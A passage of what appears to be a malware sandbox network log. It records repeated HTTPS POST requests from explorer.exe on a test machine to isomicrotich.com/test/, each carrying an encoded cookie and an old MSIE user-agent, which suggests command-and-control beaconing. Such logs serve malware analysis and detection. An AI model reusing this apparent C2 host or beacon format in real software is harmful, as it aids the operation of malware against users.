                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5t8ezLelBzD%2BLsY2b229sCtR3oVwfyoggJ7%2FZEibj0WpbNhn3SQ8hTdS1g6zqVq4WkLg1rSyIVE0CAIuQesdy6UKpv5AdK6ongtsmsA%2FZ5SNlCcrK3YAtv8g80L789YPslgj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf185f8c0e42b5-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.762263188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:30 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:30 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVX8%2BwQyO%2F%2F1mp90V1x%2F9z4deV35ShtIV7j7M6SajvNli5xArUR75v%2FgoLfqLTmKkmNIauVFOivY4AWY%2F0g26TzWBO7neu6gQ9bo9LXGIafmpOmLIesgwt2h%2FRGGfnEdCF3M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18666f750f68-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.762265188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:31 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:32 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8rnkBSrl1QJibTmsTWyo4sj%2BKprZYSv814ObQaQ7CnPUA8UApkQ11wcy%2F2lbQHokTDLE17xjIbiUZCi519d5lbxFPAhyHsXzyGXJVc8sf9CrBw0QFGGAyVvQBwW3EqBqWy5X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf186fec495e74-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.762267188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:32 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:33 UTC552INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FbZKKBnnq5oYon2qpwT6%2FPn3qLkCsGUWyNWIVuyIIPpOBYusB1dRCURKHU8EWaZwpBtrqB%2FEjml6uoXo%2BYIbL6JDAB1m2%2BxkzIROsWcJFsvTiNAH3cSeTJKJa%2FDyLSy%2FgnY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18763fc78ce9-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.762270188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:34 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:34 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Vt2kptttc83mJ%2BUAh9v7QTEJ7cueToTxtiqe5w98bmpv1KmDqAQwr7AIKHTJ8h00qCfxSjgi34k4LBHC%2BLvYRzI5KJqvJUC60vvNtMalk4ryjk0Ofs0hfAOWYsSqneEDyzl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18800d581791-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.762271188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:35 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:35 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6nWiiugKRW%2ByIPNj8Mw1GoZeWhjjcdOZP9g47SBsweQ6BrlhKQh84lbIGaQO43Qho4TyzNzVaoYSVTFdbyoe2J386SL%2FWxjyFqZydc4WyJnXfeEW4NxVLMfEmWHtdpqy8Ak"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1886af095e86-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.762272188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:36 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JR9UwX9nKp3oJWx7UE3UA49gQoUbO0gVTrYvf4M93kLyaSfVh%2FAFG8usqueupKwgtMU9xBwqw8JFH94fVGJN70YcLRXYSnX8FHddZhxGPGtoHZAHzxaDi85v%2FT06sztvECWP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf189039d642f4-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.762273188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:37 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:38 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ksba29Y1WI9Qs6E1Ph%2FDQQeTP97r2Q6ZBPWfs0ZFbxOEUxKuk%2Bg7XqEY1paa7F2OEXkM5pk3JPSRlSC8wIP90fvlzyZHkOVk5bUWfuv3vOluOkUSbffaigjtt4zjP7fK%2Bodq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1896d89441de-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.762274188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:38 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:39 UTC552INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9G4Amcr%2B2kkRkSb3etZ0OkzSFK6Bd%2FL0szNUlJJukiyv5hZdXj8lUN6RpXGbtqcJK19YpI9ov%2FosB29mcbFvG%2BUHgfJwbaEVziGure%2B3%2BO7x6WNA7lEZuLZ%2Feh4%2BJRzLA7fx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf189d8a620f5d-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.762276188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:39 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:40 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QieRimS9lbQZbBGBLoTXqVyeOLnlTjjf6Rb6kY7kC%2BcIXbgESiboLiDWtLibC8lqBpTmRRzZNDYtmGCrk%2FjbwdU9EwejrgK2t5rZXj4Rc%2FP4SuwPf0kguq9rDlX3eDDDMGHh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18a489137c8a-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                14192.168.2.762278188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:41 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:41 UTC556INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:41 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSxGgNqX8kxHuQcHBiUhn%2B%2FDmu%2F7I1oXG%2BA3U5JmucJx%2FCfnqjBVsb5E%2B7%2Fm5G3eMQ%2F3YawXin8ayGnx43imIJYth1V65N%2FBw2BxeYIeoo6Gn7t%2FqizX866R9elC10EjjUCF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18ab29f6433f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.762279188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:42 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:42 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzjvHNPlffFWJL7vs%2BAuAIaAHqAGKTJfT2GpaV67Uvt9DBrWd1vfUE3eAd13NvFKGfMWjveoHvdrRK9MKBvmZxTSR5jahJmI9VZ81gjEhXd5H%2Fr%2BTtBzTeUNAqujY8q%2BpIeL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18b46ec243e9-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.762282188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:43 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:44 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4E4d%2BilSVx8wFFKBVpITag2RLmNvQrgF8G9ZIrvF2OGeKARobIrM0QzZgZaN%2FrPBGFVU9Augjc%2B3h9IdvTcR6qSWhUbxtFUa4vWi6GWJ5IkWLN99ZHCSeSGgCC4PywmskZS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18baed7c8cba-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.762284188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:45 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
